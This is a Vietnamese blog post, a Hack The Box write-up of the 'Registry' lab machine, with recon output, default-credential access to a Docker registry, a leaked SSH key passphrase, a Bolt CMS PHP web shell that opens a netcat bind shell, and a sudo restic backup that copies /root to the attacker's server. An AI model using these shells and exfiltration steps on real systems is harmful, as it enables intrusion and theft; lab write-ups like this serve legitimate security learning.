<!DOCTYPE html>
<html lang="en" dir="auto">

<head><meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="robots" content="index, follow">
<title>Writeup Htb Registry | minhtuanact | Blog</title>

<meta name="keywords" content="" />
<meta name="description" content="Tả thực Vào một ngày đẹp trời (à thực ra thì cũng không đẹp lắm, trời vừa mưa vừa rét chả đi chơi được đâu) thì có người bạn mình trong team bảo chơi hackthebox và đang có lỗi. Được cái mình cũng nhiệt tình &#43; phá hoại nên vào giúp tý cho vui.
Start Recon ➜ ~ ./nmapAutomator.sh 10.10.10.159 all Running a all scan on 10.10.10.159 Host is likely running Linux ---------------------Starting Nmap Quick Scan--------------------- Starting Nmap 7.">
<meta name="author" content="minhtuanact">
<link rel="canonical" href="https://minhtuanact.github.io/post/writeup-htb-registry/" />
<link href="/assets/css/stylesheet.min.d85457619e67d31b97f40ed67c71b5efe0b52508ba759e5a9da0760afd6707db.css" integrity="sha256-2FRXYZ5n0xuX9A7WfHG17&#43;C1JQi6dZ5anaB2Cv1nB9s=" rel="preload stylesheet"
    as="style">

<link rel="icon" href="https://minhtuanact.github.io/favicon.ico">
<link rel="icon" type="image/png" sizes="16x16" href="https://minhtuanact.github.io/favicon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://minhtuanact.github.io/favicon-32x32.png">
<link rel="apple-touch-icon" href="https://minhtuanact.github.io/apple-touch-icon.png">
<link rel="mask-icon" href="https://minhtuanact.github.io/safari-pinned-tab.svg">
<meta name="theme-color" content="#2e2e33">
<meta name="msapplication-TileColor" content="#2e2e33">
<meta name="generator" content="Hugo 0.82.0" />


<meta property="og:title" content="Writeup Htb Registry" />
<meta property="og:description" content="Tả thực Vào một ngày đẹp trời (à thực ra thì cũng không đẹp lắm, trời vừa mưa vừa rét chả đi chơi được đâu) thì có người bạn mình trong team bảo chơi hackthebox và đang có lỗi. Được cái mình cũng nhiệt tình &#43; phá hoại nên vào giúp tý cho vui.
Start Recon ➜ ~ ./nmapAutomator.sh 10.10.10.159 all Running a all scan on 10.10.10.159 Host is likely running Linux ---------------------Starting Nmap Quick Scan--------------------- Starting Nmap 7." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://minhtuanact.github.io/post/writeup-htb-registry/" /><meta property="og:image" content="https://minhtuanact.github.io/papermod-cover.png"/><meta property="article:section" content="post" />
<meta property="article:published_time" content="2020-02-10T15:52:14&#43;07:00" />
<meta property="article:modified_time" content="2020-02-10T15:52:14&#43;07:00" />

<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://minhtuanact.github.io/papermod-cover.png"/>

<meta name="twitter:title" content="Writeup Htb Registry"/>
<meta name="twitter:description" content="Tả thực Vào một ngày đẹp trời (à thực ra thì cũng không đẹp lắm, trời vừa mưa vừa rét chả đi chơi được đâu) thì có người bạn mình trong team bảo chơi hackthebox và đang có lỗi. Được cái mình cũng nhiệt tình &#43; phá hoại nên vào giúp tý cho vui.
Start Recon ➜ ~ ./nmapAutomator.sh 10.10.10.159 all Running a all scan on 10.10.10.159 Host is likely running Linux ---------------------Starting Nmap Quick Scan--------------------- Starting Nmap 7."/>


<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [
    {
      "@type": "ListItem",
      "position":  1 ,
      "name": "Posts",
      "item": "https://minhtuanact.github.io/post/"
    }, 
    {
      "@type": "ListItem",
      "position":  2 ,
      "name": "Writeup Htb Registry",
      "item": "https://minhtuanact.github.io/post/writeup-htb-registry/"
    }
  ]
}
</script>
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "Writeup Htb Registry",
  "name": "Writeup Htb Registry",
  "description": "Tả thực Vào một ngày đẹp trời (à thực ra thì cũng không đẹp lắm, trời vừa mưa vừa rét chả đi chơi được đâu) thì có người bạn mình trong team bảo chơi hackthebox và đang có lỗi. Được cái mình cũng nhiệt tình + phá hoại nên vào giúp tý cho vui.\nStart Recon ➜ ~ ./nmapAutomator.sh 10.10.10.159 all Running a all scan on 10.10.10.159 Host is likely running Linux ---------------------Starting Nmap Quick Scan--------------------- Starting Nmap 7.",
  "keywords": [
    
  ],
  "articleBody": "Tả thực Vào một ngày đẹp trời (à thực ra thì cũng không đẹp lắm, trời vừa mưa vừa rét chả đi chơi được đâu) thì có người bạn mình trong team bảo chơi hackthebox và đang có lỗi. Được cái mình cũng nhiệt tình + phá hoại nên vào giúp tý cho vui.\nStart Recon ➜ ~ ./nmapAutomator.sh 10.10.10.159 all Running a all scan on 10.10.10.159 Host is likely running Linux ---------------------Starting Nmap Quick Scan--------------------- Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-10 15:50 +07 Nmap scan report for 10.10.10.159 Host is up (0.20s latency). Not shown: 905 closed ports, 92 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 5.22 seconds ---------------------Starting Nmap Basic Scan--------------------- Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-10 15:50 +07 Nmap scan report for 10.10.10.159 Host is up (0.19s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA) | 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA) |_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Site doesn't have a title. 443/tcp open ssl/http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Site doesn't have a title. | ssl-cert: Subject: commonName=docker.registry.htb | Not valid before: 2019-05-06T21:14:35 |_Not valid after: 2029-05-03T21:14:35 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.38 seconds Thấy đoạn\nssl-cert: Subject: commonName=docker.registry.htb Sửa /etc/hosts thêm đoạn\n10.10.10.159 docker.registry.htb registry.htb Sử dụng gobuster recon thư mục\ngobuster dir -u http://docker.registry.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -l 40 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) \u0026 Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://docker.registry.htb [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Show length: true [+] Timeout: 10s =============================================================== 2020/02/10 16:09:49 Starting gobuster =============================================================== /v2 (Status: 301) [Size: 39] Thấy có thư mục /v2 báo 301 thì trang này có gắn basic auth. Thử nhập admin:admin vào thì được :v. Ăn may xíu thôi. Sau khi nhập được basic auth thì ở docker có thư mục _catalog để kiểm tra có image gì trong đấy. Lấy cờ User Vậy là ta biết được image tên là gì rồi thì mình pull docker về xem sao.\nNhưng trong lúc mình pull docker về thì gặp lỗi này\nminhtuan@kali:~$ sudo docker pull docker.registry.htb/bolt-image Using default tag: latest Error response from daemon: Get https://docker.registry.htb/v2/: x509: certificate signed by unknown authority Hóa ra là mình chưa có certificate. Vậy thì update certificate thủ công thôi Vào https://docker.registry.htb tải file .crt về copy file đấy vào\n/usr/local/share/ca-certificates sudo update-ca-certificates sudo service docker restart minhtuan@kali:~$ sudo docker login https://docker.registry.htb Username: admin Password: WARNING! Your password will be stored unencrypted in /root/.docker/config.json. Configure a credential helper to remove this warning. See https://docs.docker.com/engine/reference/commandline/login/#credentials-store Login Succeeded Thành công, lúc này ta có thể pull docker về và sử dụng bình thường rồi.\n➜ ~ docker pull docker.registry.htb/bolt-image Using default tag: latest latest: Pulling from bolt-image Digest: sha256:eeff225e5fae33dc832c3f82fd8b0db363a73eac4f0f0cb587094be54050539b Status: Image is up to date for docker.registry.htb/bolt-image:latest docker.registry.htb/bolt-image:latest Pull về xong rồi thì chui vào thôi\n➜ ~ docker run --rm -it docker.registry.htb/bolt-image:latest root@9818304f783b:/# Kinh nghiệm của mình là cứ tập trung vào những folder nào nó cực kỳ nhạy cảm như ssh, rồi mấy thư mục user, /var/www/html xem có gì không. Lục mãi thì trong thư mục /root/.ssh có file private key ssh. Mừng huýnh rồi sử dụng ssh2john.py và john brute force lấy pass private key nhưng mà k được. Nên mình quay lại docker xem bên trong còn gì nữa không. Sau một hồi tìm kiếm lùng sục thì mình thấy có 1 file này ở đây.\nroot@9818304f783b:/etc/profile.d# cat 01-ssh.sh #!/usr/bin/expect -f #eval `ssh-agent -s` spawn ssh-add /root/.ssh/id_rsa expect \"Enter passphrase for /root/.ssh/id_rsa:\" send \"GkOcz221Ftb3ugog\\n\"; expect \"Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)\" interact Vậy đây là đoạn chương trình tạo khóa private key. Mật khẩu file id_rsa kia là GkOcz221Ftb3ugog. Việc còn lại là mình ssh vào machine thôi.\n➜ registry ssh -i id_rsa root@10.10.10.159 Enter passphrase for key 'id_rsa': root@10.10.10.159's password: K được. Cơ mà mình hơi ngây thơ, ssh vào root thì bài này đã dễ quá =)). Xong mình nhìn lại cái tên image docker là bolt-image. Thử sử dụng user ssh là bolt xem sao.\n➜ registry ssh -i id_rsa bolt@10.10.10.159 Enter passphrase for key 'id_rsa': Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64) System information as of Mon Feb 10 09:35:17 UTC 2020 System load: 0.0 Users logged in: 1 Usage of /: 5.7% of 61.80GB IP address for eth0: 10.10.10.159 Memory usage: 32% IP address for br-1bad9bd75d17: 172.18.0.1 Swap usage: 0% IP address for docker0: 172.17.0.1 Processes: 173 Last login: Mon Feb 10 09:06:21 2020 from 10.10.16.7 bolt@bolt:~$ user.txt cat user.txt và submit lên thôi :v\nLấy cờ Root Mình sử dụng private key để đăng nhập vào ssh của bolt nên mình chưa thể sử dụng sudo right để leo thang đặc quyền được vì khi gõ sudo -l hệ thống sẽ yêu cầu nhập mật khẩu của bolt. Mình đã sử dụng LinEnum.sh để khai thác ở user bolt này nhưng chưa thu được kết quả gì. Thử đủ loại exploit mà k lên được root. Điều khiến cho mình tập trung tiếp là vào phần web. Mình tìm thấy được trong thư mục web có thư mục /bolt thì mình thử vào xem sao. Trang này được tạo bởi Bolt CMS, là 1 opensource. Mình đọc trên doc thì thấy chỗ login https://docs.bolt.cm/3.7/manual/login là /login nhưng mà thử thì lại bắn ra lỗi 404. Xong rồi mình thử lại là http://registry.htb/bolt/bolt thì lại vào được trang login (nani, chả hiểu kiểu gì). Công cuộc tiếp theo thì tìm kiếm account admin đăng nhập vào đây thôi. Lục tiếp trong folder /var/www/html/bolt thì có 1 file db\nbolt@bolt:/var/www/html/bolt/app/database$ ls bolt.db bolt@bolt:/var/www/html/bolt/app/database$ file bolt.db bolt.db: SQLite 3.x database, last written using SQLite version 3022000 Check file thì đây là 1 file db SQLite 3. Tiếc là trên machine lại k có sqlite3 nên mình copy file này về máy để kiểm tra. Sử dụng scp để copy file bolt.db về máy mình\n➜ registry scp -i id_rsa bolt@10.10.10.159:/var/www/html/bolt/app/database/bolt.db . Sau khi đã copy xong file thì mình chui vào xem trong đó có gì, mình tìm thấy tài khoản admin ở trong bảng bolt_users\n➜ registry sqlite3 bolt.db SQLite version 3.31.0 2019-12-29 00:52:41 Enter \".help\" for usage hints. sqlite .table bolt_authtoken bolt_field_value bolt_pages bolt_users bolt_blocks bolt_homepage bolt_relations bolt_cron bolt_log_change bolt_showcases bolt_entries bolt_log_system bolt_taxonomy sqlite select * from bolt_users ... ; 1|admin|$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK|bolt@registry.htb|2020-02-09 23:27:11|10.10.15.117|Admin|[\"themes://basic.php\",\"themes://rev.php\",\"themes://base-2018/meh.twig\",\"themes://meh.twig\",\"themes://shell.php\"]|1||||0||[\"root\",\"everyone\"] sqlite Sử dụng john để crack passwd admin ra được passwd là strawberry, đăng nhập vào http://registry.htb/bolt/bolt Ở đây có 1 trình upload file, ta thử upload file shell lên đây nhưng mà nó k cho upload file php lên. Ta sửa 1 chút config ở đây để server cho phép upload file php Sau đấy ta lưu lại rồi chuyển sang chức năng upload đẩy shell lên. Ban đầu mình sử dụng https://github.com/flozz/p0wny-shell nhưng mà mình k thể reverse shell lại máy mình được, dường như là ở đây cấu hình firewall chặn kết nối ra ngoài. Viết đủ thể loại shell php upload lên nhưng mà k được, nên mình nghĩ đến là sử dụng máy mình reverse shell lên máy chủ. Sử dụng file shell.php php system(\"nc.traditional -lvp 4444 -e /bin/bash\"); \nUpload lên rồi bên máy mình sử dụng lệnh\n➜ registry nc -nv 10.10.10.159 4444 (UNKNOWN) [10.10.10.159] 4444 (?) open Upgrade shell\npython -c 'import pty; pty.spawn(\"/bin/bash\")' Đến đây rồi lại tiếp tục sử dụng LinEnum.sh để kiểm tra xem có gì không thì mình thấy cái này\n[+] We can sudo without supplying a password! Matching Defaults entries for www-data on bolt: env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User www-data may run the following commands on bolt: (root) NOPASSWD: /usr/bin/restic backup -r rest* Tập trung hết cơm gạo vào phần này để lấy root =)).\nGiới thiệu sơ qua một chút, restic là 1 opensource sử dụng để backup, nói rõ hơn thì mình cũng chịu vì cái này quá mới so với mình =)), chả biết gì cả.\nNgồi đọc document của nó tại đây https://restic.readthedocs.io/en/latest/ Sau một khoảng thời gian đọc doc với lên mạng tìm exam câu lệnh của nó thì mới biết là nó cần 1 server để backup. Người bạn chơi cùng mình bảo là nó có 1 restic server, nó tự động chạy trên cổng 8000. Mình ngồi tải file binary của nó ở đây https://github.com/restic/rest-server/releases\n➜ Downloads ./rest-server-0.9.7-linux-amd64 rest-server 0.9.7 compiled with go1.10 on linux/amd64 Data directory: /tmp/restic Authentication disabled Private repositories disabled Starting server on :8000 Chạy server xong thì tạo repo restic để lưu file backup\n➜ Downloads apt-get install restic ➜ Downloads restic init -r /tmp/restic enter password for new repository: enter password again: created restic repository 03ab053496 at /tmp/restic Please note that knowledge of your password is required to access the repository. Losing your password means that your data is irrecoverably lost. Điều cần làm bây giờ là ánh xạ cổng 8000 từ máy mình lên machine cũng trên cổng 8000 luôn cho nhanh (thực ra cho dễ nhớ =))). Sử dụng ssh ánh xạ qua user bolt. À mà ban đầu mình dùng www-data nhưng mà chả hiểu ánh xạ lên kiểu gì, biết mỗi ánh xạ qua ssh thì dùng qua thằng bolt luôn. Nhưng chẳng hiểu kiểu gì thằng www-data cũng xài được luôn. Nghĩ ngẫm 1 hồi hóa ra là nó chạy trên quyền root cái lệnh restic =)).\n➜ registry ssh -i id_rsa -R 8000:127.0.0.1:8000 bolt@10.10.10.159 Sử dụng restic với quyền sudo backup thư mục /root\nwww-data@bolt:~/html$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8000 /root for repository: 123123 password is correct found 2 old cache directories in /var/www/.cache/restic, pass --cleanup-cache to remove them scan [/root] scanned 10 directories, 14 files in 0:00 [0:01] 100.00% 28.066 KiB / 28.066 KiB 24 / 24 items 0 errors ETA 0:00 duration: 0:01 snapshot e5ef88b3 saved www-data@bolt:~/html$ Ngon, lưu snapshot được về máy mình rồi, điều quan trọng giờ là tìm lệnh để đọc nó ra thôi. Ngồi cat mấy cái folder trong /tmp/restic mà nó mã hóa hết luôn, nhìn như kiểu blockchain =)), sợ vl. Ngồi đọc doc thấy đoạn này, hóa ra là nó dùng restore chứ nó đếch đọc được kiểu bt =)).\n➜ restic restic -r /tmp/restic restore e5ef88b3 --target /tmp/restic-root enter password for repository: repository 03ab0534 opened successfully, password is correct restoring [/root] at 2020-02-10 06:26:17.454661805 +0000 UTC by root@bolt to /tmp/restic-root Xong rồi, vào /tmp/restic-root mà đọc cờ cuối thôi ;))\n➜ restic cd /tmp/restic-root ➜ restic-root ;s zsh: command not found: s ➜ restic-root ls root ➜ restic-root cd root ➜ root ls config.yml cron.sh root.txt Funfact  Cay 1   Cay 2: Thề luôn chả biết cái gì thằng restic, khai thác machine này khá khó đối với mình. Cay 3: Đang suy nghĩ nhưng khá là cay.  Thanks  Nguyen Van Khanh B Nguyen Xuan Hoa  ",
  "wordCount" : "1864",
  "inLanguage": "en",
  "datePublished": "2020-02-10T15:52:14+07:00",
  "dateModified": "2020-02-10T15:52:14+07:00",
  "author":{
    "@type": "Person",
    "name": "minhtuanact"
  },
  "mainEntityOfPage": {
    "@type": "WebPage",
    "@id": "https://minhtuanact.github.io/post/writeup-htb-registry/"
  },
  "publisher": {
    "@type": "Organization",
    "name": "minhtuanact | Blog",
    "logo": {
      "@type": "ImageObject",
      "url": "https://minhtuanact.github.io/favicon.ico"
    }
  }
}
</script>





</head>

<body class="" id="top">
<script>
    if (localStorage.getItem("pref-theme") === "dark") {
        document.body.classList.add('dark');
    } else if (localStorage.getItem("pref-theme") === "light") {
        document.body.classList.remove('dark')
    } else if (window.matchMedia('(prefers-color-scheme: dark)').matches) {
        document.body.classList.add('dark');
    }

</script>
<noscript>
    <style type="text/css">
        #theme-toggle,
        .top-link {
            display: none;
        }

    </style>
    <style>
        @media (prefers-color-scheme: dark) {
            :root {
                --theme: #1d1e20;
                --entry: #2e2e33;
                --primary: rgba(255, 255, 255, 0.84);
                --secondary: rgba(255, 255, 255, 0.56);
                --tertiary: rgba(255, 255, 255, 0.16);
                --content: rgba(255, 255, 255, 0.74);
                --hljs-bg: #2e2e33;
                --code-bg: #37383e;
                --border: #333;
            }

            .list {
                background: var(--theme);
            }

            .list:not(.dark)::-webkit-scrollbar-track {
                background: 0 0;
            }

            .list:not(.dark)::-webkit-scrollbar-thumb {
                border-color: var(--theme);
            }
        }
    </style>

</noscript>
<header class="header">
    <nav class="nav">
        <div class="logo">
            <a href="https://minhtuanact.github.io/" accesskey="h" title="minhtuanact | Blog (Alt + H)">minhtuanact | Blog</a>
            <span class="logo-switches">
                <button id="theme-toggle" accesskey="t" title="(Alt + T)">
                    <svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"
                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                        stroke-linejoin="round">
                        <path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path>
                    </svg>
                    <svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"
                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                        stroke-linejoin="round">
                        <circle cx="12" cy="12" r="5"></circle>
                        <line x1="12" y1="1" x2="12" y2="3"></line>
                        <line x1="12" y1="21" x2="12" y2="23"></line>
                        <line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line>
                        <line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line>
                        <line x1="1" y1="12" x2="3" y2="12"></line>
                        <line x1="21" y1="12" x2="23" y2="12"></line>
                        <line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line>
                        <line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line>
                    </svg>
                </button>
                
                
            </span>
        </div>
        <ul id="menu" onscroll="menu_on_scroll()">
            <li>
                <a href="https://minhtuanact.github.io/archives/" title="Archive">
                    <span>Archive</span>
                </a>
            </li>
            <li>
                <a href="https://minhtuanact.github.io/categories/" title="Categories">
                    <span>Categories</span>
                </a>
            </li>
            <li>
                <a href="https://minhtuanact.github.io/search/" title="Search (Alt &#43; /)" accesskey=/>
                    <span>Search</span>
                </a>
            </li>
            <li>
                <a href="https://minhtuanact.github.io/tags/" title="Tags">
                    <span>Tags</span>
                </a>
            </li></ul>
    </nav>
</header>

    <main class="main">

<article class="post-single">
  <header class="post-header">
<div class="breadcrumbs">

    <a href="https://minhtuanact.github.io/">Home</a>&nbsp;»&nbsp;<a href="https://minhtuanact.github.io/post/">Posts</a>
</div>

    <h1 class="post-title">
      Writeup Htb Registry
    </h1>
    <div class="post-meta">

February 10, 2020&nbsp;·&nbsp;9 min&nbsp;·&nbsp;minhtuanact


</div>
  </header> 

  <div class="toc">
    <details >
      <summary accesskey="c" title="(Alt + C)">
        <div class="details">Table of Contents</div>
      </summary>
      <div class="inner"><ul><li>
        <a href="#t%e1%ba%a3-th%e1%bb%b1c" aria-label="Tả thực">Tả thực</a></li><li>
        <a href="#start" aria-label="Start">Start</a><ul>
            <li>
        <a href="#recon" aria-label="Recon">Recon</a></li><li>
        <a href="#l%e1%ba%a5y-c%e1%bb%9d-user" aria-label="Lấy cờ User">Lấy cờ User</a></li><li>
        <a href="#l%e1%ba%a5y-c%e1%bb%9d-root" aria-label="Lấy cờ Root">Lấy cờ Root</a></li><li>
        <a href="#funfact" aria-label="Funfact">Funfact</a></li><li>
        <a href="#thanks" aria-label="Thanks">Thanks</a></li></ul>
</li></ul>
      </div>
    </details>
  </div>
  <div class="post-content">
<p><img loading="lazy" src="/img/MinhTuan-2020-02-10-15-53-10-593x373.png" alt=""  />
</p>
<h1 id="tả-thực">Tả thực<a hidden class="anchor" aria-hidden="true" href="#tả-thực">#</a></h1>
<p>Vào một ngày đẹp trời (à thực ra thì cũng không đẹp lắm, trời vừa mưa vừa rét chả đi chơi được đâu) thì có người bạn mình trong team bảo chơi hackthebox và đang có lỗi. Được cái mình cũng nhiệt tình + phá hoại nên vào giúp tý cho vui.</p>
<h1 id="start">Start<a hidden class="anchor" aria-hidden="true" href="#start">#</a></h1>
<h2 id="recon">Recon<a hidden class="anchor" aria-hidden="true" href="#recon">#</a></h2>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  ~ ./nmapAutomator.sh 10.10.10.159 all

Running a all scan on 10.10.10.159

Host is likely running Linux



---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 <span style="color:#f92672">(</span> https://nmap.org <span style="color:#f92672">)</span> at 2020-02-10 15:50 +07
Nmap scan report <span style="color:#66d9ef">for</span> 10.10.10.159
Host is up <span style="color:#f92672">(</span>0.20s latency<span style="color:#f92672">)</span>.
Not shown: <span style="color:#ae81ff">905</span> closed ports, <span style="color:#ae81ff">92</span> filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap <span style="color:#66d9ef">done</span>: <span style="color:#ae81ff">1</span> IP address <span style="color:#f92672">(</span><span style="color:#ae81ff">1</span> host up<span style="color:#f92672">)</span> scanned in 5.22 seconds



---------------------Starting Nmap Basic Scan---------------------

Starting Nmap 7.80 <span style="color:#f92672">(</span> https://nmap.org <span style="color:#f92672">)</span> at 2020-02-10 15:50 +07
Nmap scan report <span style="color:#66d9ef">for</span> 10.10.10.159
Host is up <span style="color:#f92672">(</span>0.19s latency<span style="color:#f92672">)</span>.

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span style="color:#f92672">(</span>Ubuntu Linux; protocol 2.0<span style="color:#f92672">)</span>
| ssh-hostkey: 
|   <span style="color:#ae81ff">2048</span> 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 <span style="color:#f92672">(</span>RSA<span style="color:#f92672">)</span>
|   <span style="color:#ae81ff">256</span> c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d <span style="color:#f92672">(</span>ECDSA<span style="color:#f92672">)</span>
|_  <span style="color:#ae81ff">256</span> 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 <span style="color:#f92672">(</span>ED25519<span style="color:#f92672">)</span>
80/tcp  open  http     nginx 1.14.0 <span style="color:#f92672">(</span>Ubuntu<span style="color:#f92672">)</span>
|_http-server-header: nginx/1.14.0 <span style="color:#f92672">(</span>Ubuntu<span style="color:#f92672">)</span>
|_http-title: Site doesn<span style="color:#e6db74">&#39;t have a title.
</span><span style="color:#e6db74">443/tcp open  ssl/http nginx 1.14.0 (Ubuntu)
</span><span style="color:#e6db74">|_http-server-header: nginx/1.14.0 (Ubuntu)
</span><span style="color:#e6db74">|_http-title: Site doesn&#39;</span>t have a title.
| ssl-cert: Subject: commonName<span style="color:#f92672">=</span>docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after:  2029-05-03T21:14:35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap <span style="color:#66d9ef">done</span>: <span style="color:#ae81ff">1</span> IP address <span style="color:#f92672">(</span><span style="color:#ae81ff">1</span> host up<span style="color:#f92672">)</span> scanned in 28.38 seconds
</code></pre></div><p>Thấy đoạn</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">ssl-cert: Subject: commonName<span style="color:#f92672">=</span>docker.registry.htb
</code></pre></div><p>Sửa <code>/etc/hosts</code> thêm đoạn</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">10.10.10.159 docker.registry.htb registry.htb
</code></pre></div><p>Sử dụng <code>gobuster</code> recon thư mục</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">gobuster dir -u http://docker.registry.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -l 40
<span style="color:#f92672">===============================================================</span>
Gobuster v3.0.1
by OJ Reeves <span style="color:#f92672">(</span>@TheColonial<span style="color:#f92672">)</span> &amp; Christian Mehlmauer <span style="color:#f92672">(</span>@_FireFart_<span style="color:#f92672">)</span>
<span style="color:#f92672">===============================================================</span>
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Url:            http://docker.registry.htb
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Threads:        <span style="color:#ae81ff">10</span>
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Status codes:   200,204,301,302,307,401,403
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> User Agent:     gobuster/3.0.1
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Show length:    true
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Timeout:        10s
<span style="color:#f92672">===============================================================</span>
2020/02/10 16:09:49 Starting gobuster
<span style="color:#f92672">===============================================================</span>
/v2 <span style="color:#f92672">(</span>Status: 301<span style="color:#f92672">)</span> <span style="color:#f92672">[</span>Size: 39<span style="color:#f92672">]</span>

</code></pre></div><p>Thấy có thư mục <code>/v2</code> báo <code>301</code> thì trang này có gắn basic auth. Thử nhập <code>admin:admin</code> vào thì được :v. Ăn may xíu thôi.
Sau khi nhập được basic auth thì ở <code>docker</code> có thư mục <code>_catalog</code> để kiểm tra có image gì trong đấy.
<img loading="lazy" src="/img/MinhTuan-2020-02-10-16-16-45-551x232.png" alt=""  />
</p>
<h2 id="lấy-cờ-user">Lấy cờ User<a hidden class="anchor" aria-hidden="true" href="#lấy-cờ-user">#</a></h2>
<p>Vậy là ta biết được image tên là gì rồi thì mình pull docker về xem sao.</p>
<p>Nhưng trong lúc mình pull docker về thì gặp lỗi này</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">minhtuan@kali:~$ sudo docker pull docker.registry.htb/bolt-image
Using default tag: latest
Error response from daemon: Get https://docker.registry.htb/v2/: x509: certificate signed by unknown authority
</code></pre></div><p>Hóa ra là mình chưa có certificate. Vậy thì update certificate thủ công thôi
Vào <a href="https://docker.registry.htb">https://docker.registry.htb</a> tải file .crt về
copy file đấy vào</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">/usr/local/share/ca-certificates
sudo update-ca-certificates
sudo service docker restart
</code></pre></div><div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">minhtuan@kali:~$ sudo docker login https://docker.registry.htb
Username: admin
Password: 
WARNING! Your password will be stored unencrypted in /root/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded
</code></pre></div><p>Thành công, lúc này ta có thể pull docker về và sử dụng bình thường rồi.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  ~ docker pull docker.registry.htb/bolt-image
Using default tag: latest
latest: Pulling from bolt-image
Digest: sha256:eeff225e5fae33dc832c3f82fd8b0db363a73eac4f0f0cb587094be54050539b
